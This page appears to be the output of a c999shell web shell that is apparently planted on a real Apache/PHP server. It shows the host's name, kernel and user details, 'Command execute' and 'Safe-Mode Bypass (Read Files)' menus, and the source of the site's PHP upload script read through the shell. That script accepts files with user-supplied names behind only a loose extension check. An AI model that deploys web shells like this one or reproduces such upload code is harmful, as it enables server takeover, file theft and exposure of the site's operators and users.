Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/editor/ drwxr-xr-x |
Viewing file: Select action/file-type: <?php define( '_VALID_SITE', 1 ); require_once( "../includes/website.php" ); require_once( "../includes/website.class.php" ); //$ndate = date('Ymdhis'); $ndate = date('Ymd'); $ndate .= $ndate."_"; if( !$file_name ) { echo "<body scroll=no><br /><center><h2><font color=red>กรุณาเลือกไฟล์ที่ต้องการอัพโหลด.</font></h2>"; echo "<br /><a href='javascript:history.back()'>กลับ</a></center></body></html>"; exit ; } if( ($file_size != "") && ($file_size>$filesize) ) { print "<body scroll=no><center><h2><font color=red>ขนาดไพล์ใหญ่เกิดกำหนด:</font> $file_size <font color=red>ขนาดที่รับได้คือ</font> $filesize</h2>"; print "<a href='javascript:history.back()'>กลับ</a></center></body></html>"; exit ; } //echo "$file_type<br>" ; //=== security solution, if(!image) only for download; if( !preg_match("/image\//",$file_type) //&& !preg_match("/.js/i",$file_name) && !preg_match("/.doc/i",$file_name) //&& !preg_match("/.exe/i",$file_name) && !preg_match("/.xls/i",$file_name) && !preg_match("/.zip/i",$file_name) && !preg_match("/.tar/i",$file_name) && !preg_match("/.gz/i",$file_name) && !preg_match("/.pdf/i",$file_name) && !preg_match("/.swf/i",$file_name) ) $file_name .= "~.js" ; copy( $file, "../uploads/$ndate$file_name" ) or die("The file couldn't be copied to the server"); ?> <html> <head> <title>Uploaded...</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-874" /> </head> <script language="JavaScript" type="text/JavaScript"> function onRefresh() { <?php if( preg_match("/image\//",$file_type) ) { ?> window.opener.doFormatF('InsertImage,/uploads/<?=$ndate.$file_name;?>'); //window.opener.doFormatF('InsertImage,/PI/uploads/<?=$ndate.$file_name;?>'); // Local <?php } else { if( preg_match("/.swf/i",$file_name) ) { ?> //echo "<br>การแทรก Flash จะทำให้เกิดโค้ต object ติดกับไฟล์ Flash ห้ามลบหรือแก้ไขโค้ตนั้นเด็ดขาด <br>การเก็บบันทึกจะทำให้โค้ตนั้นหายไปเอง<br>"; window.opener.insertflash('/uploads/<?=$ndate.$file_name;?>'); <?php } else { ?> window.opener.insertLink('/uploads/<?=$ndate.$file_name;?>'); <?php } // end..else } // end..else ?> window.close(); } // end..function </script> <body onLoad="onRefresh();"> </body> </html> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]-- |